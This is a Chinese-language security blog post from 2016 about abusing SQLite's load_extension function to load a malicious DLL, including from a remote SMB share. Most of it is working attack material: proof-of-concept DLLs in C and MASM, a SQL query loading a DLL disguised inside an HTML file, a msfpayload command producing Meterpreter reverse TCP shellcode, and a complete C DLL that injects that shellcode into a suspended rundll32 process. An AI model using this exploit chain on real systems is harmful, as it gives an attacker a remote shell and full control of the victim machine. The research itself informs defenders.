MENU

谈一谈SQLite Load_Extension的妙用

October 10, 2016 • Security

什么是load_extension?

这个接口加载一个SQLite扩展库的文件

int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);

更多信息:http://www.sqlite.org/c3ref/load_extension.html

你可以用这个函数来加载一个SQLite扩展。但是在默认情况下sqlite3_enable_load_extension()默认是关闭的,以防止这种情况的SQL注入攻击。

了解更多:http://www.sqlite.org/c3ref/enable_load_extension.html

语法:

select load_extension(‘path\dll’, ‘EP’);

这个路径const char *zFile可以是一个SMB共享

自定义DLL

我们可以定义自己的恶意DLL文件并执行我们自己的恶意代码

#include <windows.h>
/*
 * Author: @OsandaMalith 
 * Website: http://osandamalith.com
 */
BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:  
            MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
             MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
        break;
    }
    return TRUE;
}
  
int hello() {
    MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);

也可以使用MASM32的代码,这是个体积非常小的DLL:

.386

 ; Author: @OsandaMalith 
 ; Website: http://osandamalith.com

.MODEL flat,stdcall

OPTION CASEMAP:NONE

Include windows.inc
Include user32.inc
Include kernel32.inc

IncludeLib user32.lib
IncludeLib kernel32.lib

.DATA

AppName            db "DLL Skeleton",0
HelloMsg        db "Just Kidding :)",0
LoadMsg            db "You got Pwned!",0
UnloadMsg        db "The DLL is unloaded",0
ThreadCreated    db "A thread is created in this process",0
ThreadDestroyed    db "A thread is destroyed in this process",0

.code
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
    .if reason==DLL_PROCESS_ATTACH
        invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
    .elseif reason==DLL_PROCESS_DETACH
        invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
    .elseif reason==DLL_THREAD_ATTACH
        invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
    .else        
        invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
    .endif
    mov  eax,TRUE
    ret
DllEntry Endp

hello proc
    invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
    ret    
hello endp

End DllEntry

1.png

HTML + DLL

你可以通过hasherezade来检查drop_and_run项目

http://github.com/hasherezade/snippets/tree/master/drop_and_run的demo.html是我们的嵌入式HTML注释中的DLL文件。因此,我们可以嵌入我们的恶意DLL代码到一个HTML文件中

select load_extension('\\192.168.0.100\WinAsm\dll\cdll.html','hello');

2.png

Shellcode + GameOver

也可以用自己的DLL来编写shellcode,在这个例子中我使用的是Meterpreter反向TCP shellcode

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -t c

Code:

#include <windows.h>
/*
 * Website: http://osandamalith.com
 */
#define SCSIZE 2048
unsigned char code[SCSIZE] = 
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";
 
void inline_bzero(void *p, size_t l)
{
     
           BYTE *q = (BYTE *)p;
           size_t x = 0;
           for (x = 0; x < l; x++)
                     *(q++) = 0x00;
}
  
void boom(void);
  
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
        case DLL_PROCESS_ATTACH:
            boom();
            break;
  
        case DLL_PROCESS_DETACH:
            break;
  
        case DLL_THREAD_ATTACH:
            break;
  
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}
  
void boom(void) {
    int error;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    CONTEXT ctx;
    DWORD prot;
   LPVOID ep;
 
    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);
  
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);
  
       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  
        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
  
#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif
  
        SetThreadContext(pi.hThread,&ctx);
  
        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   ExitThread(0);
}

3.png

参考

Archives QR Code
QR Code for this page
Tipping QR Code